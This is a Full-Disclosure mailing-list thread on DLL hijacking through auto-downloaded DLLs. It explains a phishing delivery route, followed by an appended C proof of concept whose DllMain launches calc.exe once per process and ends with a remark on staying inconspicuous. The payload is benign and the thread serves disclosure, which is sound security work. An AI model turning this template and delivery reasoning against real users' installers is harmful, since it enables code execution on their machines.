1. The attack is aiming at a very low-hanging fruit, so low in fact it probably fell on the ground once and has a few bugs on it; this is the nature of phishing. If the redirect is well designed or the method of delivery is convincing enough, they will click save, assuming that only executing it would be dangerous; the vendor page will be convincing enough in itself (theoretically) to lead them to the update/install. Even if they assumed it was sketchy, chances are they would still leave it in their downloads folder or remove the entry from their list of previously downloaded files without running it. Not clicking the installer wouldn't be a loss either, because the next update/install they run (be it days, weeks, or months later) will likely load the DLL.
2. That was a dumb addition on my part: every time DllMain is entered it will launch calc.exe. If I had removed the comment from that line it would have exited on the first execution, but instead this will launch for each call, which is sometimes quite a bunch. Not ideal for testing lots of installers, but fun to watch?

On Mon, Aug 13, 2012 at 3:02 PM, Christian Sciberras <[email protected]> wrote:
> I've got two concerns about this:
>
> 1. Either way you put it, I can't see how one can make a convincing argument out of downloading a DLL file.
> Asking laymen, they'd ask "what's a dll for? weren't updates done with exe/msi/etc? why's it got that funny icon?"
>
> 2. I'm a bit curious about your choice of code, and why you commented out exit(0); (what's the point anyway?)
>
> Cheers,
> Chris.
>
> On Mon, Aug 13, 2012 at 7:19 PM, Gynvael Coldwind <[email protected]> wrote:
>> Well, what can I say - your write-up is accurate.
>>
>> Though the last time I saw it, around 5 years ago, it was still called DLL spoofing and not DLL hijacking, and was one of the arguments why "carpet bombing" (automatic download) in Safari/Chrome must be fixed :)
>> E.g. http://gynvael.coldwind.pl/?id=55
>>
>> --
>> gynvael.coldwind//vx
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
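As an added example (not code from the original poster or from anyone else in this thread), here is how the DllMain payload described in point 2 can be gated on the reason code so it runs once per process instead of on every entry into DllMain. The Windows reason codes are the ones from winnt.h, reproduced so the gate compiles off Windows; the loader call sequence in main is constructed for illustration (an installer that spins up three worker threads), and the real DllMain body, which launches calc.exe the way the PoC in the thread did, only compiles under _WIN32.

```c
/* Added example: gating a DLL-hijacking PoC payload on the DllMain reason
 * code, so it fires once per process rather than on every thread attach
 * and detach. Not the original poster's code. On non-Windows hosts this
 * builds as a stand-alone simulation of the loader's DllMain calls. */
#include <stdbool.h>
#include <stdio.h>

#ifdef _WIN32
#include <windows.h>
#else
/* Reason codes as defined in winnt.h, reproduced (assumption: values match
 * the Windows SDK) so the gate logic can be exercised off Windows. */
#define DLL_PROCESS_DETACH 0
#define DLL_PROCESS_ATTACH 1
#define DLL_THREAD_ATTACH  2
#define DLL_THREAD_DETACH  3
typedef unsigned long DWORD;
#endif

/* Decide whether the payload should run for this DllMain entry.
 * Returns true only for the first DLL_PROCESS_ATTACH seen by this image;
 * thread attach/detach and process detach are ignored. */
bool payload_should_fire(DWORD reason, bool *fired)
{
    if (reason != DLL_PROCESS_ATTACH || *fired)
        return false;
    *fired = true;
    return true;
}

/* Models the original snippet: calc.exe launched on every DllMain entry. */
int count_ungated(const DWORD *reasons, int n)
{
    (void)reasons;
    return n;
}

/* Same call sequence with the reason-code gate applied. */
int count_gated(const DWORD *reasons, int n)
{
    bool fired = false;
    int launches = 0;
    for (int i = 0; i < n; i++)
        if (payload_should_fire(reasons[i], &fired))
            launches++;
    return launches;
}

/* Constructed loader sequence: process attach, three worker threads that
 * start and exit, then process detach. */
static const DWORD demo_sequence[] = {
    DLL_PROCESS_ATTACH,
    DLL_THREAD_ATTACH, DLL_THREAD_ATTACH, DLL_THREAD_ATTACH,
    DLL_THREAD_DETACH, DLL_THREAD_DETACH, DLL_THREAD_DETACH,
    DLL_PROCESS_DETACH
};
#define DEMO_LEN ((int)(sizeof demo_sequence / sizeof demo_sequence[0]))

int demo_ungated_launches(void) { return count_ungated(demo_sequence, DEMO_LEN); }
int demo_gated_launches(void)   { return count_gated(demo_sequence, DEMO_LEN); }

#ifdef _WIN32
/* The real entry point. Spawning a process from DllMain runs under the
 * loader lock and is unsafe in general; acceptable for a proof of concept. */
BOOL WINAPI DllMain(HINSTANCE inst, DWORD reason, LPVOID reserved)
{
    static bool fired = false;
    (void)inst; (void)reserved;
    if (payload_should_fire(reason, &fired))
        WinExec("calc.exe", SW_SHOW);
    return TRUE;
}
#endif

int main(void)
{
    printf("ungated launches: %d\n", demo_ungated_launches());
    printf("gated launches:   %d\n", demo_gated_launches());
    return 0;
}
```

With the gate in place the PoC fires once per installer that loads the DLL, which is what you want when testing many installers in a row; returning FALSE from DllMain instead would make the load fail and is more conspicuous than a single calc.exe.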
